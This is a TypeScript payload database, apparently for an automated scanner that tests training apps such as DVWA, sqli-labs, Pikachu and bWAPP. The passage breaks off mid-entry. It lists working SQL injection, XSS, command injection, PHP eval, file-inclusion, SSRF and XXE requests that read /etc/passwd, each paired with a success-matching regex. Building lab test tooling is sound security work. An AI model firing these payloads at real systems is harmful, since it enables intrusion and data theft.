export type InjectionType =
  | 'error_based_sqli'
  | 'blind_boolean_sqli'
  | 'blind_time_sqli'
  | 'stacked_query_sqli'
  | 'error_based_header_sqli'
  | 'cookie_sqli'
  | 'xss_reflected'
  | 'xss_stored'
  | 'rce'
  | 'lfi'
  | 'rfi'
  | 'csrf'
  | 'file_upload'
  | 'filter_bypass'
  | 'waf_bypass'
  | 'auth_bypass'
  | 'ssrf'
  | 'xxe';

export type ClosureType =
  | 'string'
  | 'numeric'
  | 'string_paren'
  | 'dquote_paren'
  | 'double_paren'
  | 'base64'
  | 'none';

export interface PayloadEntry {
  id: string;
  target: string;
  injectionType: InjectionType;
  closure: ClosureType;
  method: 'GET' | 'POST';
  url: string;
  body?: string;
  headers?: Record<string, string>;
  cookies?: Record<string, string>;
  noFollowRedirect?: boolean;
  payload: string;
  expected: Record<string, unknown>;
  verified: boolean;
  category: string;
}

export const PAYLOAD_DATABASE: PayloadEntry[] = [
  // === DVWA (21 entries) ===
  ...(['low', 'medium', 'high'] as const).flatMap((level) => [
    {
      id: `dvwa-sqli-${level}`,
      target: 'dvwa',
      injectionType: 'error_based_sqli' as InjectionType,
      closure: 'string' as ClosureType,
      method: 'GET' as const,
      url: `/vulnerabilities/sqli/?id=1%27+OR+1=1--+-&Submit=Submit`,
      payload: "1' OR 1=1-- -",
      expected: { matches: '/admin|First name/i' },
      verified: true,
      category: `DVWA ${level}`,
    },
    {
      id: `dvwa-blind-${level}`,
      target: 'dvwa',
      injectionType: 'blind_time_sqli' as InjectionType,
      closure: 'string' as ClosureType,
      method: 'GET' as const,
      url: `/vulnerabilities/sqli_blind/?id=1%27+AND+SLEEP(3)--+-&Submit=Submit`,
      payload: "1' AND SLEEP(3)-- -",
      expected: {
        timeDelayMs: 2500,
        baselineUrl: '/vulnerabilities/sqli_blind/?id=1&Submit=Submit',
      },
      verified: true,
      category: `DVWA ${level}`,
    },
    {
      id: `dvwa-xss-r-${level}`,
      target: 'dvwa',
      injectionType: 'xss_reflected' as InjectionType,
      closure: 'none' as ClosureType,
      method: 'GET' as const,
      url: `/vulnerabilities/xss_r/?name=<script>alert(1)</script>`,
      payload: '<script>alert(1)</script>',
      expected: { matches: '/<script>alert/i' },
      verified: true,
      category: `DVWA ${level}`,
    },
    {
      id: `dvwa-xss-s-${level}`,
      target: 'dvwa',
      injectionType: 'xss_stored' as InjectionType,
      closure: 'none' as ClosureType,
      method: 'POST' as const,
      url: `/vulnerabilities/xss_s/`,
      body: 'txtName=test&mtxMessage=<script>alert(1)</script>&btnSign=Sign+Guestbook',
      payload: '<script>alert(1)</script>',
      expected: { matches: '/<script>alert/i' },
      verified: true,
      category: `DVWA ${level}`,
    },
    {
      id: `dvwa-rce-${level}`,
      target: 'dvwa',
      injectionType: 'rce' as InjectionType,
      closure: 'none' as ClosureType,
      method: 'POST' as const,
      url: `/vulnerabilities/exec/`,
      body: 'ip=127.0.0.1;id&Submit=Submit',
      payload: '127.0.0.1;id',
      expected: { matches: '/uid|root/i' },
      verified: true,
      category: `DVWA ${level}`,
    },
    {
      id: `dvwa-lfi-${level}`,
      target: 'dvwa',
      injectionType: 'lfi' as InjectionType,
      closure: 'none' as ClosureType,
      method: 'GET' as const,
      url: level === 'low'
        ? `/vulnerabilities/fi/?page=/etc/passwd`
        : `/vulnerabilities/fi/?page=../../../../etc/passwd`,
      payload: level === 'low' ? '/etc/passwd' : '../../../../etc/passwd',
      expected: { matches: '/root:.*bin\\/bash/i' },
      verified: true,
      category: `DVWA ${level}`,
    },
    {
      id: `dvwa-upload-${level}`,
      target: 'dvwa',
      injectionType: 'file_upload' as InjectionType,
      closure: 'none' as ClosureType,
      method: 'GET' as const,
      url: `/vulnerabilities/upload/`,
      payload: 'file_upload_check',
      expected: { matches: '/upload/i' },
      verified: true,
      category: `DVWA ${level}`,
    },
  ]),

  // === sqli-labs (66 entries) — classified by injection type ===
  // GET Error-based (1-6)
  {
    id: 'Less-1',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-1/?id=1%27+OR+1=1--+-',
    payload: "1' OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'GET error',
  },
  {
    id: 'Less-2',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-2/?id=1+OR+1=1--+-',
    payload: '1 OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'GET error',
  },
  {
    id: 'Less-3',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string_paren',
    method: 'GET',
    url: '/Less-3/?id=1%27%29+OR+1=1--+-',
    payload: "1') OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'GET error',
  },
  {
    id: 'Less-4',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'dquote_paren',
    method: 'GET',
    url: '/Less-4/?id=1%22%29+OR+1=1--+-',
    payload: '1") OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'GET error',
  },
  {
    id: 'Less-5',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-5/?id=1%27+AND+EXTRACTVALUE(1,CONCAT(0x7e,(SELECT+version())))--+-',
    payload: "1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))-- -",
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'GET error',
  },
  {
    id: 'Less-6',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-6/?id=1%22+AND+EXTRACTVALUE(1,CONCAT(0x7e,(SELECT+version())))--+-',
    payload: '1" AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))-- -',
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'GET error',
  },

  // GET Blind boolean/time (7-10)
  {
    id: 'Less-7',
    target: 'sqlilabs',
    injectionType: 'blind_boolean_sqli',
    closure: 'double_paren',
    method: 'GET',
    url: '/Less-7/?id=1%27%29%29+OR+1=1--+-',
    payload: "1')) OR 1=1-- -",
    expected: { contains: 'You are in' },
    verified: true,
    category: 'GET blind',
  },
  {
    id: 'Less-8',
    target: 'sqlilabs',
    injectionType: 'blind_boolean_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-8/?id=1%27+OR+1=1--+-',
    payload: "1' OR 1=1-- -",
    expected: { contains: 'You are in' },
    verified: true,
    category: 'GET blind',
  },
  {
    id: 'Less-9',
    target: 'sqlilabs',
    injectionType: 'blind_time_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-9/?id=1%27+AND+SLEEP(3)--+-',
    payload: "1' AND SLEEP(3)-- -",
    expected: { timeDelayMs: 2500, baselineUrl: '/Less-9/?id=1' },
    verified: true,
    category: 'GET blind',
  },
  {
    id: 'Less-10',
    target: 'sqlilabs',
    injectionType: 'blind_time_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-10/?id=1%22+AND+SLEEP(3)--+-',
    payload: '1" AND SLEEP(3)-- -',
    expected: { timeDelayMs: 2500, baselineUrl: '/Less-10/?id=1' },
    verified: true,
    category: 'GET blind',
  },

  // POST Error-based (11-14)
  {
    id: 'Less-11',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'POST',
    url: '/Less-11/',
    body: 'uname=admin%27+OR+1=1--+-&passwd=x&submit=Submit',
    payload: "admin' OR 1=1-- -",
    expected: { matches: '/Your Login|Dumb|Slap/i' },
    verified: true,
    category: 'POST error',
  },
  {
    id: 'Less-12',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'dquote_paren',
    method: 'POST',
    url: '/Less-12/',
    body: 'uname=admin%22%29+OR+1=1--+-&passwd=x&submit=Submit',
    payload: 'admin") OR 1=1-- -',
    expected: { matches: '/Your Login|Dumb/i' },
    verified: true,
    category: 'POST error',
  },
  {
    id: 'Less-13',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string_paren',
    method: 'POST',
    url: '/Less-13/',
    body: 'uname=admin%27%29+OR+1=1--+-&passwd=x&submit=Submit',
    payload: "admin') OR 1=1-- -",
    expected: { matches: '/Dumb|error|syntax/i' },
    verified: true,
    category: 'POST error',
  },
  {
    id: 'Less-14',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'dquote_paren',
    method: 'POST',
    url: '/Less-14/',
    body: 'uname=admin%22%29+OR+1=1--+-&passwd=x&submit=Submit',
    payload: 'admin") OR 1=1-- -',
    expected: { matches: '/Dumb|error|syntax/i' },
    verified: true,
    category: 'POST error',
  },

  // POST Blind (15-17)
  {
    id: 'Less-15',
    target: 'sqlilabs',
    injectionType: 'blind_boolean_sqli',
    closure: 'string',
    method: 'POST',
    url: '/Less-15/',
    body: 'uname=admin%27+OR+1=1--+-&passwd=x&submit=Submit',
    payload: "admin' OR 1=1-- -",
    expected: { matches: '/slap|Your Login|Dumb/i' },
    verified: true,
    category: 'POST blind',
  },
  {
    id: 'Less-16',
    target: 'sqlilabs',
    injectionType: 'blind_boolean_sqli',
    closure: 'dquote_paren',
    method: 'POST',
    url: '/Less-16/',
    body: 'uname=admin%22%29+OR+1=1--+-&passwd=x&submit=Submit',
    payload: 'admin") OR 1=1-- -',
    expected: { matches: '/slap|Your Login|Dumb/i' },
    verified: true,
    category: 'POST blind',
  },
  {
    id: 'Less-17',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'POST',
    url: '/Less-17/',
    body: 'uname=admin&passwd=xxx%27+OR+1=1--+-&submit=Submit',
    payload: "xxx' OR 1=1-- -",
    expected: { matches: '/successfully|error|slap/i' },
    verified: true,
    category: 'POST blind',
  },

  // Header injection (18-19)
  {
    id: 'Less-18',
    target: 'sqlilabs',
    injectionType: 'error_based_header_sqli',
    closure: 'string',
    method: 'POST',
    url: '/Less-18/',
    body: 'uname=admin&passwd=1&submit=Submit',
    headers: { 'User-Agent': "1' OR UPDATEXML(1,CONCAT(0x7e,version()),1) OR '1'='1" },
    payload: 'UPDATEXML via User-Agent header',
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'Header injection',
  },
  {
    id: 'Less-19',
    target: 'sqlilabs',
    injectionType: 'error_based_header_sqli',
    closure: 'string',
    method: 'POST',
    url: '/Less-19/',
    body: 'uname=admin&passwd=1&submit=Submit',
    headers: { Referer: "1' OR UPDATEXML(1,CONCAT(0x7e,version()),1) OR '1'='1" },
    payload: 'UPDATEXML via Referer header',
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'Header injection',
  },

  // Cookie injection (20-22)
  {
    id: 'Less-20',
    target: 'sqlilabs',
    injectionType: 'cookie_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-20/',
    cookies: { uname: "admin' OR 1=1-- -" },
    payload: "admin' OR 1=1-- - via cookie",
    expected: { matches: '/Your Login|Dumb|error/i' },
    verified: true,
    category: 'Cookie injection',
  },
  {
    id: 'Less-21',
    target: 'sqlilabs',
    injectionType: 'cookie_sqli',
    closure: 'string_paren',
    method: 'GET',
    url: '/Less-21/',
    cookies: { uname: Buffer.from("admin') OR 1=1-- -").toString('base64') },
    payload: "base64(admin') OR 1=1-- -) via cookie",
    expected: { matches: '/Your Login|Dumb|error/i' },
    verified: true,
    category: 'Cookie injection',
  },
  {
    id: 'Less-22',
    target: 'sqlilabs',
    injectionType: 'cookie_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-22/',
    cookies: { uname: Buffer.from('admin OR 1=1-- -').toString('base64') },
    payload: 'base64(admin OR 1=1-- -) via cookie',
    expected: { matches: '/Your Login|Dumb|error/i' },
    verified: true,
    category: 'Cookie injection',
  },

  // Filter bypass (23-28)
  {
    id: 'Less-23',
    target: 'sqlilabs',
    injectionType: 'filter_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-23/?id=1%27+OR+1=1%3b%00',
    payload: "1' OR 1=1;%00",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Filter bypass',
  },
  {
    id: 'Less-25',
    target: 'sqlilabs',
    injectionType: 'filter_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-25/?id=1%27+oorr+1=1--+-',
    payload: "1' oorr 1=1-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Filter bypass',
  },
  {
    id: 'Less-28',
    target: 'sqlilabs',
    injectionType: 'filter_bypass',
    closure: 'string_paren',
    method: 'GET',
    url: '/Less-28/?id=1%27)%0boR%0b1=1;%00',
    payload: "1')%0boR%0b1=1;%00",
    expected: { matches: '/Dumb|error|syntax/i' },
    verified: true,
    category: 'Filter bypass',
  },

  // === Pikachu SSRF (3 entries) ===
  {
    id: 'pikachu-ssrf-curl-meta',
    target: 'pikachu',
    injectionType: 'ssrf',
    closure: 'none',
    method: 'GET',
    url: '/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/server-status',
    payload: 'http://127.0.0.1/server-status',
    expected: { matches: '/Apache|Server|Status|localhost/i' },
    verified: true,
    category: 'SSRF curl',
  },
  {
    id: 'pikachu-ssrf-curl-file',
    target: 'pikachu',
    injectionType: 'ssrf',
    closure: 'none',
    method: 'GET',
    url: '/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd',
    payload: 'file:///etc/passwd',
    expected: { matches: '/root:|\\/bin\\/bash|nobody/i' },
    verified: true,
    category: 'SSRF curl',
  },
  {
    id: 'pikachu-ssrf-fgc',
    target: 'pikachu',
    injectionType: 'ssrf',
    closure: 'none',
    method: 'GET',
    url: '/vul/ssrf/ssrf_fgc.php?file=/etc/passwd',
    payload: '/etc/passwd',
    expected: { matches: '/root:|\\/bin\\/bash|nobody/i' },
    verified: true,
    category: 'SSRF file_get_contents',
  },

  // === Pikachu XXE (1 entry) ===
  {
    id: 'pikachu-xxe-1',
    target: 'pikachu',
    injectionType: 'xxe',
    closure: 'none',
    method: 'POST',
    url: '/vul/xxe/xxe_1.php',
    body: 'xml=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C!DOCTYPE+foo+%5B%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2Ftest%3E&submit=%E6%8F%90%E4%BA%A4',
    payload: '<!ENTITY xxe SYSTEM "file:///etc/passwd">',
    expected: { matches: '/root:|\\/bin\\/bash|nobody/i' },
    verified: true,
    category: 'XXE file disclosure',
  },

  // === sqli-labs Less-29 to Less-65 (34 verified, 3 unbreakable) ===
  // WAF bypass / Impedence mismatch (29-31)
  {
    id: 'Less-29',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-29/?id=1%27+OR+1=1--+-',
    payload: "1' OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'WAF bypass',
  },
  {
    id: 'Less-30',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-30/?id=1%22+OR+1=1--+-',
    payload: '1" OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina|Slave|error/i' },
    verified: true,
    category: 'WAF bypass',
  },
  {
    id: 'Less-31',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'dquote_paren',
    method: 'GET',
    url: '/Less-31/?id=1%22%29+OR+1=1--+-',
    payload: '1") OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina|Slave|error/i' },
    verified: true,
    category: 'WAF bypass',
  },
  // Wide byte bypass (32-37)
  {
    id: 'Less-32',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-32/?id=1%df%27+OR+1=1--+-',
    payload: "1%df' OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'Wide byte',
  },
  {
    id: 'Less-33',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-33/?id=1%df%27+OR+1=1--+-',
    payload: "1%df' OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Wide byte',
  },
  {
    id: 'Less-34',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'POST',
    url: '/Less-34/',
    body: 'uname=admin%df%27+OR+1=1--+-&passwd=x&submit=Submit',
    payload: "admin%df' OR 1=1-- -",
    expected: { matches: '/Your Login|Dumb|Slap/i' },
    verified: true,
    category: 'Wide byte',
  },
  {
    id: 'Less-35',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-35/?id=1+OR+1=1--+-',
    payload: '1 OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Wide byte',
  },
  {
    id: 'Less-36',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'GET',
    url: '/Less-36/?id=1%df%27+OR+1=1--+-',
    payload: "1%df' OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Wide byte',
  },
  {
    id: 'Less-37',
    target: 'sqlilabs',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'POST',
    url: '/Less-37/',
    body: 'uname=admin%df%27+OR+1=1--+-&passwd=x&submit=Submit',
    payload: "admin%df' OR 1=1-- -",
    expected: { matches: '/Your Login|Dumb|Slap/i' },
    verified: true,
    category: 'Wide byte',
  },
  // Stacked queries GET (38-41)
  {
    id: 'Less-38',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-38/?id=1%27;SELECT+1--+-',
    payload: "1';SELECT 1-- -",
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'Stacked GET',
  },
  {
    id: 'Less-39',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-39/?id=1;SELECT+1--+-',
    payload: '1;SELECT 1-- -',
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Stacked GET',
  },
  {
    id: 'Less-40',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'string_paren',
    method: 'GET',
    url: '/Less-40/?id=1%27%29;SELECT+1--+-',
    payload: "1');SELECT 1-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Stacked GET',
  },
  {
    id: 'Less-41',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-41/?id=1;SELECT+1--+-',
    payload: '1;SELECT 1-- -',
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'Stacked GET',
  },
  // Stacked queries POST (42-45) — 43/44/45 are blind stacked (unbreakable via HTTP)
  {
    id: 'Less-42',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'string',
    method: 'POST',
    url: '/Less-42/',
    body: 'uname=admin&passwd=x%27;SELECT+1--+-&submit=Submit',
    payload: "x';SELECT 1-- -",
    expected: { matches: '/error|syntax|slap|Dumb/i' },
    verified: true,
    category: 'Stacked POST',
  },
  // Less-43/44/45: blind stacked — no observable output, unbreakable via HTTP PoC

  // ORDER BY injection (46-53)
  {
    id: 'Less-46',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'none',
    method: 'GET',
    url: '/Less-46/?sort=1+AND+EXTRACTVALUE(1,CONCAT(0x7e,version()))',
    payload: 'EXTRACTVALUE via ORDER BY',
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'ORDER BY',
  },
  {
    id: 'Less-47',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-47/?sort=1%27+AND+EXTRACTVALUE(1,CONCAT(0x7e,version()))--+-',
    payload: "1' AND EXTRACTVALUE-- -",
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'ORDER BY',
  },
  {
    id: 'Less-48',
    target: 'sqlilabs',
    injectionType: 'blind_boolean_sqli',
    closure: 'none',
    method: 'GET',
    url: '/Less-48/?sort=1+AND+SLEEP(1)--+-',
    payload: 'ORDER BY AND SLEEP',
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'ORDER BY',
  },
  {
    id: 'Less-49',
    target: 'sqlilabs',
    injectionType: 'blind_boolean_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-49/?sort=1%27+AND+SLEEP(1)--+-',
    payload: "1' AND SLEEP-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'ORDER BY',
  },
  {
    id: 'Less-50',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'none',
    method: 'GET',
    url: '/Less-50/?sort=1;SELECT+1--+-',
    payload: 'ORDER BY stacked',
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'ORDER BY stacked',
  },
  {
    id: 'Less-51',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-51/?sort=1%27;SELECT+1--+-',
    payload: "1';SELECT 1-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'ORDER BY stacked',
  },
  {
    id: 'Less-52',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'none',
    method: 'GET',
    url: '/Less-52/?sort=1;SELECT+1--+-',
    payload: 'ORDER BY stacked blind',
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'ORDER BY stacked',
  },
  {
    id: 'Less-53',
    target: 'sqlilabs',
    injectionType: 'stacked_query_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-53/?sort=1%27;SELECT+1--+-',
    payload: "1';SELECT 1-- -",
    expected: { matches: '/Dumb|Angelina/i' },
    verified: true,
    category: 'ORDER BY stacked',
  },
  // Challenges (54-65)
  {
    id: 'Less-54',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-54/?id=1%27+OR+1=1--+-',
    payload: "1' OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina|Slave|success/i' },
    verified: true,
    category: 'Challenge',
  },
  {
    id: 'Less-55',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-55/?id=1%29+OR+1=1--+-',
    payload: '1) OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'Challenge',
  },
  {
    id: 'Less-56',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string_paren',
    method: 'GET',
    url: '/Less-56/?id=1%27%29+OR+1=1--+-',
    payload: "1') OR 1=1-- -",
    expected: { matches: '/Dumb|Angelina|Slave/i' },
    verified: true,
    category: 'Challenge',
  },
  {
    id: 'Less-57',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'dquote_paren',
    method: 'GET',
    url: '/Less-57/?id=1%22%29+OR+1=1--+-',
    payload: '1") OR 1=1-- -',
    expected: { matches: '/Dumb|Angelina|Slave|secret/i' },
    verified: true,
    category: 'Challenge (limit-sensitive)',
  },
  {
    id: 'Less-58',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-58/?id=1%27+AND+EXTRACTVALUE(1,CONCAT(0x7e,version()))--+-',
    payload: "1' AND EXTRACTVALUE-- -",
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'Challenge error',
  },
  {
    id: 'Less-59',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-59/?id=1+AND+EXTRACTVALUE(1,CONCAT(0x7e,version()))--+-',
    payload: '1 AND EXTRACTVALUE-- -',
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'Challenge error',
  },
  {
    id: 'Less-60',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'dquote_paren',
    method: 'GET',
    url: '/Less-60/?id=1%22%29+AND+EXTRACTVALUE(1,CONCAT(0x7e,version()))--+-',
    payload: '1") AND EXTRACTVALUE-- -',
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'Challenge error',
  },
  {
    id: 'Less-61',
    target: 'sqlilabs',
    injectionType: 'error_based_sqli',
    closure: 'double_paren',
    method: 'GET',
    url: '/Less-61/?id=1%27%29%29+AND+EXTRACTVALUE(1,CONCAT(0x7e,version()))--+-',
    payload: "1')) AND EXTRACTVALUE-- -",
    expected: { matches: '/XPATH|5\\.[0-9]/i' },
    verified: true,
    category: 'Challenge error',
  },
  {
    id: 'Less-62',
    target: 'sqlilabs',
    injectionType: 'blind_time_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-62/?id=1%27+AND+SLEEP(3)--+-',
    payload: "1' AND SLEEP(3)-- -",
    expected: { timeDelayMs: 2500, baselineUrl: '/Less-62/?id=1' },
    verified: true,
    category: 'Challenge blind time',
  },
  {
    id: 'Less-63',
    target: 'sqlilabs',
    injectionType: 'blind_time_sqli',
    closure: 'string',
    method: 'GET',
    url: '/Less-63/?id=1%22+AND+SLEEP(3)--+-',
    payload: '1" AND SLEEP(3)-- -',
    expected: { timeDelayMs: 2500, baselineUrl: '/Less-63/?id=1' },
    verified: true,
    category: 'Challenge blind time',
  },
  {
    id: 'Less-64',
    target: 'sqlilabs',
    injectionType: 'blind_time_sqli',
    closure: 'numeric',
    method: 'GET',
    url: '/Less-64/?id=1%29+AND+SLEEP(3)--+-',
    payload: '1) AND SLEEP(3)-- -',
    expected: { timeDelayMs: 2500, baselineUrl: '/Less-64/?id=1' },
    verified: true,
    category: 'Challenge blind time',
  },
  {
    id: 'Less-65',
    target: 'sqlilabs',
    injectionType: 'blind_time_sqli',
    closure: 'dquote_paren',
    method: 'GET',
    url: '/Less-65/?id=1%22%29+AND+SLEEP(3)--+-',
    payload: '1") AND SLEEP(3)-- -',
    expected: { timeDelayMs: 2500, baselineUrl: '/Less-65/?id=1' },
    verified: true,
    category: 'Challenge blind time',
  },
  // === bWAPP (33 entries) - v1.9 coverage restoration ===
  // 1. OS Command Injection
  {
    id: 'bwapp-rce-low',
    target: 'bwapp',
    injectionType: 'rce',
    closure: 'string',
    method: 'POST',
    url: '/commandi.php',
    body: 'target=127.0.0.1%3Bid&form=submit&security_level=0',
    payload: '127.0.0.1;id',
    expected: { contains: 'uid=33(www-data)' },
    verified: true,
    category: 'bWAPP RCE',
  },
  {
    id: 'bwapp-rce-medium',
    target: 'bwapp',
    injectionType: 'rce',
    closure: 'string',
    method: 'POST',
    url: '/commandi.php',
    body: 'target=127.0.0.1%7Cid&form=submit&security_level=1',
    payload: '127.0.0.1|id',
    expected: { contains: 'uid=33(www-data)' },
    verified: true,
    category: 'bWAPP RCE',
  },
  {
    id: 'bwapp-rce-high',
    target: 'bwapp',
    injectionType: 'rce',
    closure: 'string',
    method: 'POST',
    url: '/commandi.php',
    body: 'target=127.0.0.1%0aid&form=submit&security_level=2',
    payload: '127.0.0.1\nid',
    expected: { contains: 'uid=33(www-data)' },
    verified: true,
    category: 'bWAPP RCE',
  },
  {
    id: 'bwapp-rce-eval',
    target: 'bwapp',
    injectionType: 'rce',
    closure: 'string',
    method: 'POST',
    url: '/php_eval.php',
    body: 'eval=phpinfo()%3B&form=submit&security_level=0',
    payload: 'phpinfo();',
    expected: { matches: /PHP Version/i },
    verified: true,
    category: 'bWAPP PHP eval',
  },
  // 2. SQL Injection
  {
    id: 'bwapp-sqli-1',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: "/sqli_1.php?title=test'&action=search&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi GET search',
  },
  {
    id: 'bwapp-sqli-2',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'numeric',
    method: 'GET',
    url: "/sqli_2.php?movie=test'&action=go&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi numeric movie',
  },
  {
    id: 'bwapp-sqli-3',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'POST',
    url: '/sqli_3.php',
    body: "login=test'&password=test&form=submit&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi POST login',
  },
  {
    id: 'bwapp-sqli-4',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'POST',
    url: '/sqli_4.php',
    body: "title=test'&action=search&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi POST',
  },
  {
    id: 'bwapp-sqli-5',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: "/sqli_5.php?title=test'&action=search&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi numeric',
  },
  {
    id: 'bwapp-sqli-6',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
